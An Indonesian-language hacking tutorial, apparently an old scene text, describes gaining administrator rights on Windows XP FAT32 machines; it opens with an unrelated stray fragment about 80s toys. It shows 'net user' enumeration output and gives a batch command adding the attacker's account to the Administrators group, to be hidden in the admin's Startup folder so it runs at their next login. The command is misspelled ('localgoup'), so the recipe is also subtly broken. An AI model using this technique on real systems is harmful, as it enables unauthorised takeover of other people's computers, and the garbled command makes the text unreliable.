80s toys - Atari. I still have

MENDAPATKAN AKSES ADMIN WINDOWS XP



------------------------------------------------------

Author : SPYRO KiD

------------------------------------------------------



//---< Metode exploitasi:



Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:


C:\Documents and Settings\Administrator\


Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.



//---< Exploitasi


1. MELIHAT USER TERDAFTAR
------------------------------
C:\DOCUME~1\spyro>net user

User accounts for \\spyroNET

---------------------------------------------------------------------------

Administrator Guest evil
HelpAssistant SUPPORT_388945a0 SuperUser
The command completed successfully.


MELIHAT HAK AKSES USER
----------------------------------------------

C:\DOCUME~1\spyro>net user SuperUser
User name SuperUser
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 7/12/2004 3:38 AM
Password expires Never
Password changeable 7/12/2004 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/12/2004 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:

net localgoup Administrators evil /add

Simpan di lokasi berikut:
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup

Tunggu sang admin untuk login... setelah itu, level kita sudah setingkat admin ;)